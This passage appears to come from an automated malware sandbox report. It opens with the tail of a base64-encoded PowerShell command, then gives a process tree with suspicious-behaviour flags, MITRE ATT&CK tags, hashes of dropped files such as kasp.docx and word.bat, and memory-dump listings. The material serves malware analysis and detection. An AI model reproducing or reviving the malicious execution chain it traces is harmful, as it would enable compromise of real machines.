MAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n6r21vro.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9272.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9271.tmp"
7⤵
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9272.tmp
Filesize
1KB

MD5
a8af51f86a23af3d3dacfa06b277edd1

SHA1
45ed20e02f39625cfdaa26f5e708dec376e1514b

SHA256
0ec03d8a8ecdd4dc13ee1ca21a5e54b5917f990cfdee3e6a45b8b4b10a512d70

SHA512
1e78199ff5392e91f09aa80b7309b97d65cf9b29ea7086b71a89dd89d4c2f21c25532b2e685ed7914b6b10f0ef28f2baec6343ffc039be39ab4b830c8af12a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\kasp.docx
Filesize
673KB

MD5
631cf09ea52514effa5e7c97ef473f2c

SHA1
c35c472b3587a03263425ab6321f2de51e1a5660

SHA256
b5b13c6ebbfc0914384d3fd432246f2304a969a52cdcd90f8975ba6199573d86

SHA512
0a2c66247acb68c17ed6a38480e1aee654eb5a444c92f84186f0512b945b0936ce0a336046e9ae37843dac940e979d6cff4a55ca1e55b5d4e8af2d945c92b9f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\n6r21vro.dll
Filesize
3KB

MD5
87627eb17c6f65d26a8ac328b076d26f

SHA1
d342588e34cfd6c19b3d0e700f5b574cf7b9560b

SHA256
d453d9eb99411ed39f59d672acdf11f25ded2796122d8e461edd47ca714e4a1f

SHA512
95b19e3d300ec132b690eb42f592b411b86cd020bd2b90f2709966d12594c54fa36f32ec6cc3ffd634225a3c8fda761e4f6b259f6156bb0873a86b8740b05917

Download Submit
C:\Users\Admin\AppData\Local\Temp\n6r21vro.pdb
Filesize
7KB

MD5
284b7fc2e29d23bdfc95c658caec3573

SHA1
c3cc100fd42c850f300125e291db9060a5ff97bc

SHA256
5c2392a67f0b35e9a33e337d3bdb1112f1e5d0faf935a7d7d130cfd0613d77f4

SHA512
725d32d64b79f8278e2063391418372791a1897b48cbb895c86fda853389ab68cf9af0a46af6a268e3e38e241c08aa98b0583b86b4aee7a1bf09a38529cc0dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\word.bat
Filesize
6KB

MD5
f31ae7f977e63dbb98d05935377c5040

SHA1
5e257ea1e2a4767034977d2af93de6b84c32788b

SHA256
91703a36e362b846a9927a0c8b63d710899fac4ec2739bceb9f969b6cd7fbfc1

SHA512
aaa578c8979e7e4d9e282e73c5f9c28531b8074e88279c9acebd5153315f9aabbd60ebcc53d8a5398610ef707c237e94c95f6b94bab6ae48ccdc2949114dd7f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0026356c8657fa833d35429016ffc805

SHA1
8524fa2d8b95860f89950e5a37e3001d0196c5ba

SHA256
341c2b20f8875a4daf722dc65aaad1a110d8357f4249fdc5f0ae9ec80ed0fa70

SHA512
430f793d2996545ab709c6c7f6b656cf1666dc2006a1e51f83f1a6ee6cf9c4adcd9bdff065f47b339a270eff9826400377fff07f3c17654b8c27a2d5fc7beab7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0026356c8657fa833d35429016ffc805

SHA1
8524fa2d8b95860f89950e5a37e3001d0196c5ba

SHA256
341c2b20f8875a4daf722dc65aaad1a110d8357f4249fdc5f0ae9ec80ed0fa70

SHA512
430f793d2996545ab709c6c7f6b656cf1666dc2006a1e51f83f1a6ee6cf9c4adcd9bdff065f47b339a270eff9826400377fff07f3c17654b8c27a2d5fc7beab7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9271.tmp
Filesize
652B

MD5
ce65176d26af650e9b88c110408c9d0e

SHA1
a4a45fa98b7d6272eeacb90404fb638a9bcfa6d7

SHA256
f465905f33b13779f382719b8c0e4a98fba3c6a50356001389acb1d492c46097

SHA512
02e7e5d61617040ff88666a72a2880ec6a1920bd9ffcb8a9c12cba5f5a5557204fea0e0583105009156a48cfc5848e02d97ef67d89fb6e5b05b99f93c84a2cbf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n6r21vro.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n6r21vro.cmdline
Filesize
309B

MD5
ae2ca71e55078517b955b56a3939291f

SHA1
3ee2eb83e6102e8bb1dd8b99e8da680b04f088f0

SHA256
9481a5e7fe0d4293dc9854ba1565e873f7531bf586dafd2148a42c80fb384e65

SHA512
692a0d4644a475c4e805fc13b92ea40a84ca68ad0d0f699f479ca0b789c318c7fced00539d08d6036591fe7f219f87c371eb583eb0ad27a1290e55dd3d8ee588

Download Submit
memory/548-124-0x0000000074050000-0x0000000074075000-memory.dmp

Filesize
148KB

Download
memory/548-117-0x0000000072FD0000-0x000000007376C000-memory.dmp

Filesize
7.6MB

Download
memory/548-126-0x0000000071D10000-0x0000000071DAC000-memory.dmp

Filesize
624KB

Download
memory/548-125-0x0000000073D40000-0x0000000073DC5000-memory.dmp

Filesize
532KB

Download
memory/548-142-0x0000000067E30000-0x000000006806F000-memory.dmp

Filesize
2.2MB

Download
memory/548-123-0x0000000074080000-0x00000000740CB000-memory.dmp

Filesize
300KB

Download
memory/548-122-0x0000000071E70000-0x00000000720A5000-memory.dmp

Filesize
2.2MB

Download
memory/548-121-0x000000006D9F0000-0x000000006E26A000-memory.dmp

Filesize
8.5MB

Download
memory/548-118-0x0000000074CC0000-0x0000000074D41000-memory.dmp

Filesize
516KB

Download
memory/548-128-0x0000000069100000-0x00000000691C3000-memory.dmp

Filesize
780KB

Download
memory/548-130-0x0000000068AB0000-0x0000000068BB4000-memory.dmp

Filesize
1.0MB

Download
memory/548-127-0x00000000691D0000-0x000000006936E000-memory.dmp

Filesize
1.6MB

Download
memory/548-131-0x0000000068990000-0x0000000068AA4000-memory.dmp

Filesize
1.1MB

Download
memory/548-129-0x0000000074020000-0x000000007404D000-memory.dmp

Filesize
180KB

Download
memory/548-133-0x0000000004CD0000-0x0000000004D0C000-memory.dmp

Filesize
240KB

Download
memory/548-115-0x00000000720B0000-0x0000000072BA8000-memory.dmp

Filesize
11.0MB

Download
memory/548-139-0x0000000073770000-0x0000000073D1B000-memory.dmp

Filesize
5.7MB

Download
memory/548-85-0x0000000000000000-mapping.dmp

Download
memory/548-140-0x0000000068BC0000-0x00000000690F6000-memory.dmp

Filesize
5.2MB

Download
memory/548-141-0x00000000682D0000-0x0000000068921000-memory.dmp

Filesize
6.3MB

Download
memory/672-94-0x0000000000000000-mapping.dmp

Download
memory/828-103-0x0000000074080000-0x00000000740CB000-memory.dmp

Filesize
300KB

Download
memory/828-104-0x0000000074050000-0x0000000074075000-memory.dmp

Filesize
148KB

Download
memory/828-77-0x0000000000000000-mapping.dmp

Download
memory/828-108-0x0000000069100000-0x00000000691C3000-memory.dmp

Filesize
780KB

Download
memory/828-138-0x00000000682D0000-0x0000000068921000-memory.dmp

Filesize
6.3MB

Download
memory/828-112-0x0000000068990000-0x0000000068AA4000-memory.dmp

Filesize
1.1MB

Download
memory/828-110-0x0000000068BC0000-0x00000000690F6000-memory.dmp

Filesize
5.2MB

Download
memory/828-111-0x0000000068AB0000-0x0000000068BB4000-memory.dmp

Filesize
1.0MB

Download
memory/828-137-0x0000000073770000-0x0000000073D1B000-memory.dmp

Filesize
5.7MB

Download
memory/828-98-0x00000000720B0000-0x0000000072BA8000-memory.dmp

Filesize
11.0MB

Download
memory/828-99-0x0000000072FD0000-0x000000007376C000-memory.dmp

Filesize
7.6MB

Download
memory/828-100-0x0000000074CC0000-0x0000000074D41000-memory.dmp

Filesize
516KB

Download
memory/828-102-0x0000000071E70000-0x00000000720A5000-memory.dmp

Filesize
2.2MB

Download
memory/828-107-0x00000000691D0000-0x000000006936E000-memory.dmp

Filesize
1.6MB

Download
memory/828-101-0x000000006D9F0000-0x000000006E26A000-memory.dmp

Filesize
8.5MB

Download
memory/828-109-0x0000000074020000-0x000000007404D000-memory.dmp

Filesize
180KB

Download
memory/828-105-0x0000000073D40000-0x0000000073DC5000-memory.dmp

Filesize
532KB

Download
memory/828-106-0x0000000071D10000-0x0000000071DAC000-memory.dmp

Filesize
624KB

Download
memory/1304-55-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/1304-65-0x0000000073220000-0x0000000073D18000-memory.dmp

Filesize
11.0MB

Download
memory/1304-58-0x0000000074010000-0x00000000741AB000-memory.dmp

Filesize
1.6MB

Download
memory/1304-57-0x00000000741B0000-0x000000007494C000-memory.dmp

Filesize
7.6MB

Download
memory/1304-67-0x00000000741B0000-0x000000007494C000-memory.dmp

Filesize
7.6MB

Download
memory/1304-56-0x0000000073220000-0x0000000073D18000-memory.dmp

Filesize
11.0MB

Download
memory/1304-54-0x0000000076531000-0x0000000076533000-memory.dmp

Filesize
8KB

Download
memory/1304-64-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/1548-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1548-59-0x0000000000000000-mapping.dmp

Download
memory/1548-62-0x0000000070A41000-0x0000000070A44000-memory.dmp

Filesize
12KB

Download
memory/1548-155-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1548-136-0x000000006F25D000-0x000000006F268000-memory.dmp

Filesize
44KB

Download
memory/1548-68-0x000000006E271000-0x000000006E273000-memory.dmp

Filesize
8KB

Download
memory/1620-132-0x0000000000000000-mapping.dmp

Download
memory/1620-135-0x000007FEFBFB1000-0x000007FEFBFB3000-memory.dmp

Filesize
8KB

Download
memory/1728-60-0x0000000000000000-mapping.dmp

Download
memory/2000-63-0x0000000000000000-mapping.dmp

Download
memory/2000-91-0x0000000068BC0000-0x00000000690F6000-memory.dmp

Filesize
5.2MB

Download
memory/2000-70-0x0000000073770000-0x0000000073D1B000-memory.dmp

Filesize
5.7MB

Download
memory/2000-76-0x0000000071E70000-0x00000000720A5000-memory.dmp

Filesize
2.2MB

Download
memory/2000-71-0x00000000720B0000-0x0000000072BA8000-memory.dmp

Filesize
11.0MB

Download
memory/2000-80-0x0000000074080000-0x00000000740CB000-memory.dmp

Filesize
300KB

Download
memory/2000-81-0x0000000074050000-0x0000000074075000-memory.dmp

Filesize
148KB

Download
memory/2000-72-0x0000000072FD0000-0x000000007376C000-memory.dmp

Filesize
7.6MB

Download
memory/2000-89-0x0000000069100000-0x00000000691C3000-memory.dmp

Filesize
780KB

Download
memory/2000-97-0x00000000682D0000-0x0000000068921000-memory.dmp

Filesize
6.3MB

Download
memory/2000-75-0x000000006D9F0000-0x000000006E26A000-memory.dmp

Filesize
8.5MB

Download
memory/2000-73-0x0000000074CC0000-0x0000000074D41000-memory.dmp

Filesize
516KB

Download
memory/2000-82-0x0000000073D40000-0x0000000073DC5000-memory.dmp

Filesize
532KB

Download
memory/2000-83-0x0000000071D10000-0x0000000071DAC000-memory.dmp

Filesize
624KB

Download
memory/2000-84-0x00000000691D0000-0x000000006936E000-memory.dmp

Filesize
1.6MB

Download
memory/2000-90-0x0000000074020000-0x000000007404D000-memory.dmp

Filesize
180KB

Download
memory/2000-93-0x0000000068990000-0x0000000068AA4000-memory.dmp

Filesize
1.1MB

Download
memory/2000-92-0x0000000068AB0000-0x0000000068BB4000-memory.dmp

Filesize
1.0MB

Download
memory/2000-143-0x000000006D9F0000-0x000000006E26A000-memory.dmp

Filesize
8.5MB

Download
memory/2000-144-0x0000000073770000-0x0000000073D1B000-memory.dmp

Filesize
5.7MB

Download
memory/2000-145-0x00000000720B0000-0x0000000072BA8000-memory.dmp

Filesize
11.0MB

Download
memory/2000-146-0x0000000072FD0000-0x000000007376C000-memory.dmp

Filesize
7.6MB

Download
memory/2044-113-0x0000000000000000-mapping.dmp

Download